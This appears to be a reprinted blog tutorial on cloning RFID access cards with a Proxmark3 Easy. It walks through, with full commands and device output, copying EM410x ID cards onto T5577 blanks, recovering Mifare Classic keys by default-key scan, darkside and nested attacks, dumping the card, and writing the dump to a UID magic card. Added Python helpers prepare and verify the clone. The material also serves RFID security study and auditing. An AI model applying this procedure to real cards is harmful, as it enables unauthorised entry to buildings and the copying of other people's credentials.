Cracking access cards with a Proxmark3 Easy (reprinted to preserve the knowledge)

Reprinted from: https://lzy-wi.github.io/2018/07/26/proxmark3/

Please read the original author's article; if that link no longer works, read this copy.

Preface

The real problem is not security but people's hearts. Many things are designed without security in mind at the start; it is people's bad intentions that force security to be considered later.

Hardware preparation

Cracking device

Proxmark3 Easy



The cracking tool does not have to be a Proxmark3 Easy; any device that can read and modify card data will do, for example the ACR122U. The ACR122U, however, can only read and write high-frequency cards, which is a little limiting.

Various cards

Prepare some ID cards and IC cards.


Don't they all look the same?

How to tell an ID card from an IC card

  1. Light method
     Hold the card up to a strong light and look at the antenna coil: a round coil usually means an ID card, a rectangular coil usually means an IC card.
  2. NFC method
     Take a phone with NFC, turn NFC on and hold the card against it. An IC card (13.56 MHz) makes the phone beep; an ID card (125 kHz) does not.

Knowledge preparation

RFID is the technology used in access cards (for details see the linked article). Cards divide first into high-frequency (13.56 MHz) and low-frequency (125 kHz) cards, and within each frequency into many card types. The common ones are:

Type | Frequency | Characteristics
Mifare S50 (M1 for short) | High frequency | The most common card. Each card has a unique UID and stores data that can be modified. Used for student cards, meal cards, bus cards and access cards.
Mifare UltraLight (M0 for short) | High frequency | Low-cost card with a fixed factory UID; can store modifiable data. Used for metro and bus tickets.
Mifare UID (UID card for short) | High frequency | Variant of the M1 card with a rewritable UID, known abroad as the "Chinese magic card"; used to clone M1 S50 data.
EM4XX (ID card for short) | Low frequency | Common fixed-ID card: the ID is set at the factory and can only be read, never written. Low-cost access cards, residential entry cards, parking cards.
T5577 (rewritable ID card for short) | Low frequency | Used to clone ID cards. Ships blank from the factory; besides the ID it has data blocks, and some cards have a password set.
HID Prox II (HID card for short) | Low frequency | Factory-programmed low-frequency card common in the United States; its format is not interoperable with the others.

High frequency

M1 S50 card

An M1 card stores 1 KB (8 kbit) of data, divided into 16 sectors of 4 blocks each, 16 bytes per block; the block is the unit of access. Each sector has its own pair of keys and its own access conditions. Each card has a unique 4-byte (32-bit) serial number, the UID. In every sector, blocks 0, 1 and 2 are data blocks and block 3 is the sector trailer, which holds key A, the access bits and key B.
Block 0 of sector 0 is the manufacturer block; it holds the UID and cannot be changed on a genuine card.

Sector 0    03332801198804008500b42ef0bb6aa8   block 0    // manufacturer block: UID 03332801, BCC 19 (XOR of the four UID bytes), SAK, ATQA, manufacturer data; cannot be changed
            00000000000000000000000000000000   block 1    // data block
            00000000000000000000000000000000   block 2    // data block
            ffffffffffffff078069ffffffffffff   block 3    // key A (6 bytes), access bits + user byte (4 bytes: ff 07 80 69), key B (6 bytes)

Sector 1    00000000000000000000000000000000   block 4    // only block 0 of sector 0 is special; the other 15 sectors all have this structure
            00000000000000000000000000000000   block 5
            00000000000000000000000000000000   block 6
            ffffffffffffff078069ffffffffffff   block 7
                    .
                    .
                    .
Sector 15   00000000000000000000000000000000   block 60
            00000000000000000000000000000000   block 61
            00000000000000000000000000000000   block 62
            ffffffffffffff078069ffffffffffff   block 63

 

The 4 bytes in the middle of the trailer are the access bits (3 bytes, stored together with their inverted copies) plus one user byte; they control what key A and key B may do for each block. With the factory default (ff 07 80 69 above) key A can read and write all data blocks, key A itself can never be read from the card, and key B can be read with key A. Whether a key is readable at all is decided by the access bits, not by the key.

M1 UID card

The M1 UID card is a variant of the M1 S50 (the "Chinese magic card", gen1a). It behaves exactly like an S50 with one extra feature: block 0 of sector 0 can be rewritten at will, so both the UID and the manufacturer data can be changed. Block 0 is written by putting the card into a backdoor mode with special commands rather than by key authentication; in that mode the whole card can be read and written without any key, and the card cannot be bricked: even if block 0 or a sector's access bits are written wrongly, they can be repaired the same way without affecting later use.

FUID card

The FUID card is a response to readers that detect UID cards: a newer reader can recognise a UID card by the way it answers the backdoor commands and refuse it, which blocks cloned cards. An FUID card allows block 0 to be written, but only once; a wrong write cannot be undone and the card cannot be reused. After that one write it behaves exactly like a genuine M1 card, so it is hard to detect.

CUID card

The CUID card improves on the FUID card: block 0 can be rewritten repeatedly. Unlike the UID card, which writes block 0 through the backdoor commands, the CUID card writes block 0 through ordinary key authentication, and all other sectors behave like a standard M1 card. The drawbacks are that it may still be detected, and that if the UID check byte (the BCC, the XOR of the four UID bytes) in block 0 is written wrongly the card can no longer be selected and has to be scrapped.
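Two things from the sections above are worth checking offline before a dump is written to a magic card: that the BCC in block 0 matches the UID (a CUID card with a wrong BCC is dead), and what the access bits in each trailer actually permit. The following is an added example, not code from the original article; the access-condition tables follow the NXP MF1S50 datasheet and the example trailer and block 0 are the ones shown above.

```python
# Added example (not from the original article): inspect a Mifare Classic 1K
# sector trailer and manufacturer block offline before writing a dump to a magic card.
from typing import List, Tuple

AccessBits = Tuple[int, int, int]  # (C1, C2, C3) for one block

# Data-block access conditions, per the MF1S50 datasheet (transport config = (0,0,0))
DATA_BLOCK_ACCESS = {
    (0, 0, 0): "read A|B, write A|B, increment A|B, decrement A|B (transport)",
    (0, 1, 0): "read A|B, write never",
    (1, 0, 0): "read A|B, write B",
    (1, 1, 0): "read A|B, write B, increment B, decrement A|B",
    (0, 0, 1): "read A|B, write never, decrement A|B",
    (0, 1, 1): "read B, write B",
    (1, 0, 1): "read B, write never",
    (1, 1, 1): "read never, write never",
}
# Sector-trailer conditions: key A write / access bits read,write / key B read,write
TRAILER_ACCESS = {
    (0, 0, 0): "keyA write A; bits read A; keyB read A, write A (key B readable with key A)",
    (0, 1, 0): "keyA never; bits read A; keyB read A (key B readable with key A)",
    (1, 0, 0): "keyA write B; bits read A|B; keyB write B",
    (1, 1, 0): "keyA never; bits read A|B; keyB never",
    (0, 0, 1): "keyA write A; bits read A, write A; keyB read A, write A (transport)",
    (0, 1, 1): "keyA write B; bits read A|B, write B; keyB write B",
    (1, 0, 1): "keyA never; bits read A|B, write B; keyB never",
    (1, 1, 1): "keyA never; bits read A|B; keyB never",
}

TRAILER_DEFAULT = bytes.fromhex("ffffffffffff" "ff078069" "ffffffffffff")  # from the article
BLOCK0_EXAMPLE = bytes.fromhex("03332801198804008500b42ef0bb6aa8")          # from the article


def decode_access_bits(trailer: bytes) -> List[AccessBits]:
    """Return (C1, C2, C3) for blocks 0..3 of a sector from its 16-byte trailer.
    Bytes 6..8 hold C1..C3 plus their inverted copies; if the copies disagree
    the access bits are corrupt and the card refuses every access to the sector."""
    if len(trailer) != 16:
        raise ValueError("a trailer is one 16-byte block")
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    c1 = (b7 >> 4) & 0xF
    c2 = b8 & 0xF
    c3 = (b8 >> 4) & 0xF
    if (b6 & 0xF) != (c1 ^ 0xF) or (b6 >> 4) != (c2 ^ 0xF) or (b7 & 0xF) != (c3 ^ 0xF):
        raise ValueError("access bits corrupt: inverted copies do not match")
    # bit i of each nibble belongs to block i of the sector
    return [((c1 >> blk) & 1, (c2 >> blk) & 1, (c3 >> blk) & 1) for blk in range(4)]


def describe_sector(trailer: bytes) -> List[str]:
    """Human-readable permissions for the three data blocks and the trailer."""
    bits = decode_access_bits(trailer)
    lines = [f"block {i}: {DATA_BLOCK_ACCESS[b]}" for i, b in enumerate(bits[:3])]
    lines.append(f"trailer: {TRAILER_ACCESS[bits[3]]}")
    return lines


def key_b_readable(trailer: bytes) -> bool:
    """True when key B can be read with key A, i.e. it is plain data, not a secret."""
    return decode_access_bits(trailer)[3] in {(0, 0, 0), (0, 1, 0), (0, 0, 1)}


def check_manufacturer_block(block0: bytes) -> bool:
    """Block 0 of a 4-byte-UID card: UID[0..3], BCC, SAK, ATQA, manufacturer data.
    The BCC must equal the XOR of the four UID bytes."""
    if len(block0) != 16:
        raise ValueError("block 0 is one 16-byte block")
    return block0[4] == (block0[0] ^ block0[1] ^ block0[2] ^ block0[3])


def fix_bcc(block0: bytes) -> bytes:
    """Recompute the BCC so a hand-edited block 0 is safe to write to a CUID card."""
    bcc = block0[0] ^ block0[1] ^ block0[2] ^ block0[3]
    return block0[:4] + bytes([bcc]) + block0[5:]


if __name__ == "__main__":
    for line in describe_sector(TRAILER_DEFAULT):
        print(line)
    print("key B readable with key A:", key_b_readable(TRAILER_DEFAULT))
    print("block 0 BCC ok:", check_manufacturer_block(BLOCK0_EXAMPLE))
```

For the default trailer the output says that all three data blocks are in transport condition and that key B is readable with key A, which is exactly why a scan that finds only key A of a default-configured sector already gives away both keys.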

Low frequency

ID card

"ID card" is the common name; the chip inside is an EM4100 (EM41xx). Each card has a unique ID that cannot be rewritten.

T5577 card

The T5577 is a low-frequency card that can store data and can be password protected. Its special feature is that what you write decides what it looks like to a reader: write an EM ID and it becomes an ID card, write a HID number and it becomes a HID card, write an Indala number and it becomes an Indala card. It has 8 blocks of 32 bits (8 hex digits) each. Block 0 is the configuration block; it sets the modulation and data rate and so decides whether the card reads as an ID card or a HID card. Change it carelessly and the card can no longer be read. The last block is an ordinary data block when no password is set; with password mode enabled it holds the password. The layout looks like this (hex, binary, block number):

0x00148040  00000000000101001000000001000000 [0]
0xFF94C004  11111111100101001100000000000100 [1]
0xA5464942  10100101010001100100100101000010 [2]
0xFFFFF808  11111111111111111111100000001000 [3]
0x0001C000  00000000000000011100000000000000 [4]
0x0001C000  00000000000000011100000000000000 [5]
0x0001C000  00000000000000011100000000000000 [6]
0x0001C000  00000000000000011100000000000000 [7]

 

Cracking

Cracking ID cards

Installing the driver

Download the driver from the official website (link in the original).
Before installing the driver file you must disable driver signature enforcement (method linked in the original).
Installation: right-click My Computer -> Manage -> Device Manager -> right-click the device under Ports -> Update Driver -> Browse my computer -> pick from a list -> Have Disk -> locate the official driver file -> confirm.
After the driver is installed the device appears as in the picture; note the COM port.

Hardware usage

Proxmark3 Easy

1 function button
2 ABCD working-status indicator LEDs
3 USB port
4 power indicator
5 low-frequency antenna (card reading area)
6 high-frequency antenna (card reading area)

The function button is used to exit, cancel and stop operations and to force firmware flashing. The ABCD indicator LEDs show what the device is doing: flashing means an operation is in progress; steady on or steady off means the attack has failed and the device is waiting. If all LEDs are off the device has stopped; unplug it and plug it back in.

Cracking method

Read the ID number of the card → swap in a T5577 card → write the ID number into it → done.
An ID card has no password, only a card number, so it can be copied as soon as the number is known.
Software package (link in the original; archive password f8q4).
Open the official client firmware\pm3-bin-2.5.0\win32(client+GUI)\Proxmark Tool.exe, select the COM port assigned when the driver was installed (as indicated by the arrow) and connect the Proxmark3. With the device connected to the computer, the POW power indicator is blue, FULL is green and CHR flashes a faint red.

Type hw tune in COMMAND TO SEND to measure the antenna resonance voltage. If the high-frequency reading is above 5 V and the low-frequency reading above 10 V, the device can be used normally.

proxmark3> hw tune
Measuring antenna characteristics, please wait........          
# LF antenna: 22.27 V @   125.00 kHz          
# LF antenna: 31.76 V @   134.00 kHz          
# LF optimal: 31.76 V @   133.33 kHz          
# HF antenna: 20.17 V @    13.56 MHz          
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.

 

Place the low-frequency ID card (the access card) on the low-frequency antenna, type lf search to read the card, and copy the card number:

proxmark3> lf search
Reading 30000 bytes from device memory
Data fetched          
Samples @ 8 bits/smpl, decimation 1:1           
NOTE: some demods output possible binary
  if it finds something that looks like a tag          
False Positives ARE possible
Checking for known tags:
EM410x pattern found:           
EM TAG ID      : 0000001450         //ID card number; copy this. A HID card would show a HID ID here instead
Unique TAG ID  : 000000280A          
Possible de-scramble patterns          
HoneyWell IdentKey {          
DEZ 8          : 00005200          
DEZ 10         : 0000005200          
DEZ 5.5        : 00000.05200          
DEZ 3.5A       : 000.05200          
DEZ 3.5B       : 000.05200          
DEZ 3.5C       : 000.05200          
DEZ 14/IK2     : 00000000005200          
DEZ 15/IK3     : 000000000010250          
DEZ 20/ZK      : 00000000000002080010          
}
Other          : 05200_000_00005200          
Pattern Paxton : 1331792 [0x145250]          
Pattern 1      : 16652 [0x410C]          
Pattern Sebury : 5200 0 5200  [0x1450 0x0 0x1450]          
Valid EM410x ID Found! 			//Type of card

 

Place the T5577 card on the low-frequency antenna and write the number to it. The original used lf hid clone 0000001450 (output below). Note that in the standard Proxmark3 client of that era lf hid clone programs the T5577 with the HID Prox (FSK) format; the command that matches an EM410x ID is lf em4x em410xwrite <id> 1 (1 = T55x7 card type). Whichever you use, run lf search on the clone afterwards and check that it reports the same EM TAG ID as the original.

proxmark3> lf hid clone 0000001450 
Cloning tag with ID 000001450          
proxmark3> 
proxmark3> #db# DONE!

 

All of these commands can also be found in the command tree at the top left of the GUI; there are some buttons and commands on the left as well.

The ID card is now copied.
The result looks like this:

Cracking IC cards

Approach to IC card cracking

1. Get the key of any one sector

  • Darkside attack on the card's weak PRNG to recover a sector 0 key (hf mf mifare)
  • Scan the default keys (hf mf chk)
  • Sniff the traffic between a legitimate reader and the card to obtain the key
  • Emulate an M1 card to the reader and capture the key it uses (needs a reader; poor compatibility)

2. Use the nested attack (MFOC) to recover the keys of every sector from the one known key

3. Read the card data into the computer with the recovered keys

4. Write the data into a UID card

Step 1 is the most important and the hardest: on many IC cards no sector 0 key can be found and the remaining steps are impossible. The default key scan is a matter of luck, the darkside attack has a low success rate, and the last two methods succeed more often but are costly and hard to carry out.
At first I used the English GUI as the guides suggested, but I did not find it easy to use, so later I switched to the original command line. That means remembering the commands; when I forget one I look it up in the Chinese GUI. The bug only showed up once I used the original command line.
Darkside (PRNG) attack to get a sector 0 key: with firmware 486 the connection does not drop; with firmware after 630 some cards can be cracked, but with some cards the connection drops and "can't select card" appears.

Getting a sector 0 key

First the default key scan: hf mf chk *1 ? t (*1 = all sectors of a 1K card, ? = both key A and key B, t = transfer any keys found to the emulator memory)

proxmark3> hf mf chk *1 ? t
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 4d3a99c351dd
chk default key[ 6] 1a982c7e459a
chk default key[ 7] d3f7d3f7d3f7
chk default key[ 8] 714c5c886e97
chk default key[ 9] 587ee5f9350f
chk default key[10] a0478cc39091
chk default key[11] 533cb6c723f6
chk default key[12] 8fd0a4f256e9
--sector: 0, block:  3, key type:A, key count:13
		.
		.
		.
--sector:15, block: 63, key type:B, key count:13
Found valid key:[ffffffffffff]
Found keys have been transferred to the emulator memory

 

If the card uses a default key the scan finds it. Otherwise try the darkside attack on the PRNG to get a sector 0 key: hf mf mifare

proxmark3>hf mf mifare
		.
		.
		.
uid(ea117dee) nt(431c39b0) par(0000000000000000) ks(030702000a030209) nr(800000005)


|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000005| 3 |  6  |0,0,0,0,0,0,0,0|
| 20 |00000025| 7 |  2  |0,0,0,0,0,0,0,0|
| 40 |00000045| 2 |  7  |0,0,0,0,0,0,0,0|
| 60 |00000065| 0 |  5  |0,0,0,0,0,0,0,0|
| 80 |00000085| a |  f  |0,0,0,0,0,0,0,0|
| a0 |000000a5| 3 |  6  |0,0,0,0,0,0,0,0|
| c0 |000000c5| 2 |  7  |0,0,0,0,0,0,0,0|
| e0 |000000e5| 9 |  c  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...         
p1:0 p2:0 p3:0 key:ffffffffffff
p1:58b87 p2:61ec p3:1 key:b4c98bd73e94
p1:c6a1b p2:d983 p3:2 key:576efc88ccc7
p1:ef844 p2:106dd p3:3 key:34ed3c6092e9
p1:f7e1e p2:10fd7 p3:4 key:2de06659d60e
p1:1239c0 p2:13fa0 p3:5 key:08b7558601a1
p1:12d1b3 p2:149c9 p3:6 key:00adbba1e330
key_count:7
------------------------------------------------------------------
Key found:ffffffffffff

Found valid key:ffffffffffff

 

Because the device belongs to my little sister and its firmware is newer than 630, I get a lot of "#db# Mifare: can't select card", so I cannot show the complete output. Check the firmware with hw version:

proxmark3> hw version
#db# Prox/RFID mark3 RFID instrument
#db# bootrom: /-suspect 2016-11-09 00:59:56
#db# os: /-suspect 2016-12-08 12:45:38
#db# HF FPGA image built on 2015/03/09 at 08:41:42
#db#   Modify by Willok(willok@163.com)

#db#      proxmark3.taobao.com


uC: AT91SAM7S256 Rev B
Embedded Processor: ARM7TDMI
Nonvolatile Program Memory Size: 256K bytes
Second Nonvolatile Program Memory Size: None
Internal SRAM Size: 64K bytes
Architecture Identifier: AT91SAM7Sxx Series
Nonvolatile Program Memory Type: Embedded Flash Memory

 

Tip: the firmware version is identified by its build date.
We can check that the key we got is correct; if it is wrong, the last line (Found valid key) is not printed:

proxmark3> hf mf chk 0 A ffffffffffff
chk key[ 0] ffffffffffff
--sector: 0, block:  0, key type:A, key count: 1
Found valid key:[ffffffffffff]

 

Know one key, find the other fifteen

Once a key for sector 0 is known, the keys of all the other sectors can be obtained with the nested attack (the MFOC method). On Mifare Classic cards with the original weak PRNG this works essentially every time; on hardened cards, whose nonces are not produced by that PRNG, it does not.

proxmark3> hf mf nested 1 0 A ffffffffffff 			// 1 = 1K card, 0 = block 0 (sector 0), A = key type, then the known key
Testing known keys. Sector count=16
nested...
Time in nested: 4.330 (inf sec per key)

-----------------------------------------------
Iterations count: 0


|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|

 

Next export the keys (the trailing d dumps them to a file):

proxmark3> hf mf nested 1 0 A ffffffffffff d
Testing known keys. Sector count=16
nested...
Time in nested: 4.302 (inf sec per key)

-----------------------------------------------
Iterations count: 0


|---|----------------|---|----------------|---|
|sec|key A           |res|key B           |res|
|---|----------------|---|----------------|---|
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...

 

After the export a dumpkeys.bin file appears in the client's working directory; it contains key A and key B of all 16 sectors in binary.

Exporting the data

With the keys recovered, we can dump the card data to the computer (hf mf dump reads the keys from dumpkeys.bin):

proxmark3> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
	  .
	  .
	  .
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
Successfully read block  0 of sector  0.
#db# READ BLOCK FINISHED
Successfully read block  1 of sector  0.
	  .
	  .
	  .
#db# READ BLOCK FINISHED
Successfully read block  3 of sector 15.
Dumped 64 blocks (1024 bytes) to file dumpdata.bin

 

Opened in a hex editor it looks like this:

Because it is a test card, there is no data in it.

Writing to the UID card

Next, write the data into the UID card.
The Proxmark3 load command does not accept the .bin file; it has to be converted to .eml format first.
The first method is to run the following Lua script:

proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file EA117DEE.eml

-----Finished

 

The second method is to run the dump to EML.bat script to convert the file.

Write to the blank card (UID card):

proxmark3> hf mf cload  dumpdata
Loaded from file: dumpdata.eml

 

The two cards are now identical. Nothing is visible on the card itself; only a read can tell, and if you dump both cards and compare the data you will see it is exactly the same.
There is more than one way to crack IC cards; my ability and equipment are limited, and I will keep learning.
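The files the procedure above produces (dumpdata.bin, dumpkeys.bin, the .eml file) have simple fixed layouts, so the checks the article does by eye can be done offline: converting the dump to .eml, confirming the trailer keys in the dump are the keys that were actually recovered, and comparing the original with the clone block by block. The following is an added example, not code from the original article; the dumpkeys.bin layout (16 key A entries followed by 16 key B entries, 6 bytes each) and the UID-based .eml file name follow the Proxmark3 client's output shown above, and the sample card and key file are constructed here, not real dumps.

```python
# Added example (not from the original article): offline handling of the files the
# Proxmark3 workflow above produces, so a dump can be checked before it is written
# to a UID card and the clone compared with the original afterwards.
from typing import List, Tuple

BLOCKS_1K, BLOCK_SIZE, SECTORS_1K, KEY_SIZE = 64, 16, 16, 6


def dump_to_eml_lines(dump: bytes) -> List[str]:
    """What dumptoemul.lua does: one hex line per block, 64 lines for a 1K card."""
    if len(dump) != BLOCKS_1K * BLOCK_SIZE:
        raise ValueError(f"expected {BLOCKS_1K * BLOCK_SIZE} bytes, got {len(dump)}")
    return [dump[i * BLOCK_SIZE:(i + 1) * BLOCK_SIZE].hex().upper() for i in range(BLOCKS_1K)]


def eml_filename(dump: bytes) -> str:
    """dumptoemul.lua names the file after the 4-byte UID at the start of block 0."""
    return dump[:4].hex().upper() + ".eml"


def parse_dumpkeys(keys_bin: bytes) -> List[Tuple[str, str]]:
    """dumpkeys.bin layout: 16 x key A, then 16 x key B, 6 bytes each -> [(keyA, keyB)]."""
    if len(keys_bin) != 2 * SECTORS_1K * KEY_SIZE:
        raise ValueError("dumpkeys.bin for a 1K card is 192 bytes")
    key_a = [keys_bin[i * KEY_SIZE:(i + 1) * KEY_SIZE].hex() for i in range(SECTORS_1K)]
    off = SECTORS_1K * KEY_SIZE
    key_b = [keys_bin[off + i * KEY_SIZE:off + (i + 1) * KEY_SIZE].hex() for i in range(SECTORS_1K)]
    return list(zip(key_a, key_b))


def trailer_key_mismatches(dump: bytes, keys_bin: bytes) -> List[int]:
    """Sectors whose trailer key fields in the dump differ from dumpkeys.bin.
    Any sector listed here would be written to the clone with keys other than
    the ones the attack actually recovered, so the clone would not match."""
    bad = []
    for sector, (ka, kb) in enumerate(parse_dumpkeys(keys_bin)):
        trailer = dump[(sector * 4 + 3) * BLOCK_SIZE:(sector * 4 + 4) * BLOCK_SIZE]
        if trailer[:6].hex() != ka or trailer[10:].hex() != kb:
            bad.append(sector)
    return bad


def diff_dumps(original: bytes, clone: bytes) -> List[int]:
    """Block numbers that differ between two dumps; [] means the clone is identical."""
    return [i for i in range(BLOCKS_1K)
            if original[i * BLOCK_SIZE:(i + 1) * BLOCK_SIZE]
            != clone[i * BLOCK_SIZE:(i + 1) * BLOCK_SIZE]]


def constructed_dump() -> bytes:
    """Constructed test card (not a real dump): UID EA117DEE with BCC 68, SAK 08,
    ATQA 0400, empty data blocks and transport-condition trailers."""
    block0 = bytes.fromhex("ea117dee68080400") + bytes(8)
    trailer = bytes.fromhex("ffffffffffff" "ff078069" "ffffffffffff")
    sector = bytes(BLOCK_SIZE) * 3 + trailer
    return block0 + sector[BLOCK_SIZE:] + sector * (SECTORS_1K - 1)


def constructed_dumpkeys() -> bytes:
    """Matching constructed dumpkeys.bin: every sector still on ffffffffffff for both keys."""
    return bytes.fromhex("ffffffffffff") * (2 * SECTORS_1K)


if __name__ == "__main__":
    dump, keys = constructed_dump(), constructed_dumpkeys()
    lines = dump_to_eml_lines(dump)
    print(eml_filename(dump), "->", len(lines), "lines; block 0:", lines[0])
    print("sectors with trailer/key mismatch:", trailer_key_mismatches(dump, keys))
    clone = bytearray(dump)
    clone[5 * BLOCK_SIZE] ^= 0x01          # simulate a clone whose block 5 differs
    print("blocks differing between original and clone:", diff_dumps(dump, bytes(clone)))
```

To use it on real files, read dumpdata.bin and dumpkeys.bin with open(..., "rb").read(), and write "\n".join(dump_to_eml_lines(dump)) to the name returned by eml_filename before running hf mf cload.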


Added by cjcdadams on Sat, 07 Mar 2020 10:41:52 +0200